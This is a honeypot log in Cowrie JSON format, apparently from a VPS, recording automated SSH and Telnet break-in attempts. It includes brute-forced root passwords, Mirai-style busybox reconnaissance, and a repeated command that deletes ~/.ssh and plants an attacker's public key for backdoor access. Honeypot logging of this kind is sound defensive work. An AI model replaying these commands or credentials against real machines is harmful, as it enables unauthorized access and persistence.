{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:49.762638Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55700,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7b8ada2a3ce","protocol":"ssh","message":"New connection: 27.112.78.245:55700 (1.2.3.4:22) [session: c7b8ada2a3ce]","sensor":"my-vps","timestamp":"2025-08-26T00:04:50.034146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:04:50.034840Z","src_ip":"27.112.78.245","session":"c7b8ada2a3ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:04:50.314449Z","src_ip":"27.112.78.245","session":"c7b8ada2a3ce"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:04:51.564417Z","src_ip":"27.112.78.245","session":"c7b8ada2a3ce"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:52.840280Z","src_ip":"27.112.78.245","session":"c7b8ada2a3ce"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55712,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac805553a08","protocol":"ssh","message":"New connection: 27.112.78.245:55712 (1.2.3.4:22) [session: 6ac805553a08]","sensor":"my-vps","timestamp":"2025-08-26T00:04:53.099746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:04:53.100572Z","src_ip":"27.112.78.245","session":"6ac805553a08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:04:53.369939Z","src_ip":"27.112.78.245","session":"6ac805553a08"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:04:54.890855Z","src_ip":"27.112.78.245","session":"6ac805553a08"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:55.151582Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:55.152946Z","src_ip":"27.112.78.245","session":"6ac805553a08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44148,"dst_ip":"1.2.3.4","dst_port":23,"session":"3cd86f81a777","protocol":"telnet","message":"New connection: 212.227.125.160:44148 (1.2.3.4:23) [session: 3cd86f81a777]","sensor":"my-vps","timestamp":"2025-08-26T00:06:10.793160Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"zhongxing","message":"login attempt [admin/zhongxing] failed","sensor":"my-vps","timestamp":"2025-08-26T00:06:11.644442Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.login.success","username":"root","password":"dreambox","message":"login attempt [root/dreambox] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.496848Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:06:12.517998Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.791099Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.795396Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.796797Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.798700Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.799734Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T00:06:12.802939Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox TDSCX","message":"CMD: cat /proc/mounts; /bin/busybox TDSCX","sensor":"my-vps","timestamp":"2025-08-26T00:06:13.076013Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TDSCX","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TDSCX","sensor":"my-vps","timestamp":"2025-08-26T00:06:13.351264Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox TDSCX","message":"CMD: tftp; wget; /bin/busybox TDSCX","sensor":"my-vps","timestamp":"2025-08-26T00:06:13.628986Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T00:06:13.905226Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T00:06:13.908619Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"/bin/busybox TDSCX","message":"CMD: /bin/busybox TDSCX","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.180127Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.182092Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.183552Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.184177Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4f61aca9fe4eaf975811813b012f02bcbdaf1b2d48b4fdec204c84a290f0d06d","size":3550,"shasum":"4f61aca9fe4eaf975811813b012f02bcbdaf1b2d48b4fdec204c84a290f0d06d","duplicate":false,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/4f61aca9fe4eaf975811813b012f02bcbdaf1b2d48b4fdec204c84a290f0d06d after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.185567Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.session.closed","duration":3.397573232650757,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.190642Z","src_ip":"212.227.125.160","session":"3cd86f81a777"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46059,"dst_ip":"1.2.3.4","dst_port":23,"session":"dce7a778230c","protocol":"telnet","message":"New connection: 212.227.235.229:46059 (1.2.3.4:23) [session: dce7a778230c]","sensor":"my-vps","timestamp":"2025-08-26T00:06:14.282764Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":40486,"dst_ip":"1.2.3.4","dst_port":22,"session":"8613e6d2bad9","protocol":"ssh","message":"New connection: 27.112.78.245:40486 (1.2.3.4:22) [session: 8613e6d2bad9]","sensor":"my-vps","timestamp":"2025-08-26T00:06:18.322912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:06:18.323830Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:06:18.593911Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.login.success","username":"root","password":"Zj123456789","message":"login attempt [root/Zj123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:06:19.719935Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:06:20.919364Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:06:20.920079Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:06:20.921321Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:21.192198Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:06:21.790830Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:06:21.791523Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:06:22.065353Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:22.066167Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":40490,"dst_ip":"1.2.3.4","dst_port":22,"session":"565f89920685","protocol":"ssh","message":"New connection: 27.112.78.245:40490 (1.2.3.4:22) [session: 565f89920685]","sensor":"my-vps","timestamp":"2025-08-26T00:06:22.322133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:06:22.323083Z","src_ip":"27.112.78.245","session":"565f89920685"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:06:22.582544Z","src_ip":"27.112.78.245","session":"565f89920685"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:06:23.662628Z","src_ip":"27.112.78.245","session":"565f89920685"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:24.924517Z","src_ip":"27.112.78.245","session":"565f89920685"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35468,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f88395d5fe","protocol":"ssh","message":"New connection: 27.112.78.245:35468 (1.2.3.4:22) [session: 35f88395d5fe]","sensor":"my-vps","timestamp":"2025-08-26T00:06:25.193592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:06:25.194552Z","src_ip":"27.112.78.245","session":"35f88395d5fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:06:25.463522Z","src_ip":"27.112.78.245","session":"35f88395d5fe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:06:26.581875Z","src_ip":"27.112.78.245","session":"35f88395d5fe"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:26.852497Z","src_ip":"27.112.78.245","session":"35f88395d5fe"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:26.853359Z","src_ip":"27.112.78.245","session":"8613e6d2bad9"}
{"eventid":"cowrie.session.closed","duration":12.98675537109375,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:06:27.269422Z","src_ip":"212.227.235.229","session":"dce7a778230c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":58454,"dst_ip":"1.2.3.4","dst_port":22,"session":"163547b6edbc","protocol":"ssh","message":"New connection: 27.112.78.245:58454 (1.2.3.4:22) [session: 163547b6edbc]","sensor":"my-vps","timestamp":"2025-08-26T00:07:45.497523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:07:45.530349Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:07:45.802872Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZxsw23edc","message":"login attempt [root/!QAZxsw23edc] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:07:46.899626Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:07:47.467153Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:07:47.467811Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:07:47.468926Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:47.743181Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:07:48.391647Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
